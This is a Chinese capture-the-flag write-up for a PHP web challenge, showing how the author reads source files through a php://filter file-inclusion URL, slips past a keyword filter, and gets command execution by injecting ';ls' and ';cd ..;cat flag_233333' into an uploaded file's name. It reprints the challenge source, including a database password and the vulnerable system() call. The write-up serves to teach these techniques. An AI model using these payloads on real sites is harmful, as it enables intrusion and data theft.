信息收集,文件上传,rce,代码审计
打开之后是一个登录页面,同时他的url是login,呢么第一反应应该是看看有没有register.php发现是有的,..
但是admin是注册不了的,呢么我们先随机注册一个尝试看看能不能更改权限,
登陆上之后发现是没有session的也就是目前没办法切换admin账号,但是url可以看出,这里可能存在文件包含之类的,
测试之后发现是有文件包含在里的用伪协议读取
/user.php?page=php://filter/convert.base64-encode/resource=index
index.php
<?php
require_once "function.php";
if(isset($_SESSION['login'] )){Header("Location: user.php?page=info");
}
else{include "templates/index.html";
}
?
function.php
<?php
session_start();
require_once "config.php";
function Hacker()
{Header("Location: hacker.php");die();
}function filter_directory()
{$keywords = ["flag","manage","ffffllllaaaaggg"];$uri = parse_url($_SERVER["REQUEST_URI"]);parse_str($uri['query'], $query);
// var_dump($query);
// die();foreach($keywords as $token){foreach($query as $k => $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function filter_directory_guest()
{$keywords = ["flag","manage","ffffllllaaaaggg","info"];$uri = parse_url($_SERVER["REQUEST_URI"]);parse_str($uri['query'], $query);
// var_dump($query);
// die();foreach($keywords as $token){foreach($query as $k => $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function Filter($string)
{global $mysqli;$blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password";$whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";for ($i = 0; $i < strlen($string); $i++) {if (strpos("$whitelist", $string[$i]) === false) {Hacker();}}if (preg_match("/$blacklist/is", $string)) {Hacker();}if (is_string($string)) {return $mysqli->real_escape_string($string);} else {return "";}
}function sql_query($sql_query)
{global $mysqli;$res = $mysqli->query($sql_query);return $res;
}function login($user, $pass)
{$user = Filter($user);$pass = md5($pass);$sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'";echo $sql;$res = sql_query($sql);
// var_dump($res);
// die();if ($res->num_rows) {$data = $res->fetch_array();$_SESSION['user'] = $data[username_which_you_do_not_know];$_SESSION['login'] = 1;$_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];return true;} else {return false;}return;
}function updateadmin($level,$user)
{$sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' ";echo $sql;$res = sql_query($sql);
// var_dump($res);
// die();
// die($res);if ($res == 1) {return true;} else {return false;}return;
}function register($user, $pass)
{global $mysqli;$user = Filter($user);$pass = md5($pass);$sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')";$res = sql_query($sql);return $mysqli->insert_id;
}function logout()
{session_destroy();Header("Location: index.php");
}?>
config.php
<?php
error_reporting(E_ERROR | E_WARNING | E_PARSE);
define(BASEDIR, "/var/www/html/");
define(FLAG_SIG, 1);
$OPERATE = array('userinfo','upload','search');
$OPERATE_admin = array('userinfo','upload','search','manage');
$DBHOST = "localhost";
$DBUSER = "root";
$DBPASS = "Nu1LCTF2018!@#qwe";
//$DBPASS = "";
$DBNAME = "N1CTF";
$mysqli = @new mysqli($DBHOST, $DBUSER, $DBPASS, $DBNAME);
if(mysqli_connect_errno()){echo "no sql connection".mysqli_connect_error();$mysqli=null;die();
}
?
hacker.php
<?phpinclude("templates/hacker.html");
?>
然后这里不难发现是由flag的信息的,
也就是说我们可能要去读取呢个和flag有关的文件,但是这里有个parse_url() parse_str()这两个函数这个我也查到过相关资料,这里就直接给大家绕过方法
//user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg
可以发现读到了flag相关文件
ffffllllaaaaggg.php
<?php
if (FLAG_SIG != 1){die("you can not visit it directly");
}else {echo "you can find sth in m4aaannngggeee";
}
?>
m4aaannngggeee.php
<?php
if (FLAG_SIG != 1){die("you can not visit it directly");
}
include "templates/upload.html";?>
然后发现给我们了一个upload的网页,我们尝试访问一下
发现是有一个文件上传的
这样的话我们就可以去尝试上传文件
可以在报错中发现这是有一个php文件的我们尝试去读取他的源码
和刚刚的方法是一样的
upllloadddd.php
<?php
$allowtype = array("gif","png","jpg");
$size = 10000000;
$path = "./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/";
$filename = $_FILES['file']['name'];
if(is_uploaded_file($_FILES['file']['tmp_name'])){if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){die("error:can not move");}
}else{die("error:not an upload file!");
}
$newfile = $path.$filename;
echo "file upload success<br />";
echo $filename;
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
echo "<img src='data:image/png;base64,".$picdata."'></img>";
if($_FILES['file']['error']>0){unlink($newfile);die("Upload file error: ");
}ext = array_pop(explode(".",$_FILES['file']['name']));
if(!in_array($ext,$allowtype)){unlink($newfile);
}
?>
这里就有个很明显的漏洞了
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
发现他会对我们的文件名进行命令执行,然后进行输出可以看到他是对前后进行拼接的,如果我们在这里传入;给分割开,呢么我们就相当于拿到了shell
但是在这直接上传文件发现是假的,呢既然这样的话呢我们不妨尝试去url一下我们之前的文件发现manager有东西
可能真正的位置在这里
继续尝试上传
;ls
发现是爆装备了
之后我们尝试ls /发现被绊了ls ../也不行,呢么我们只能先进行目录穿越了
;cd ..;ls
;cd ..;cat flag_233333
得到flag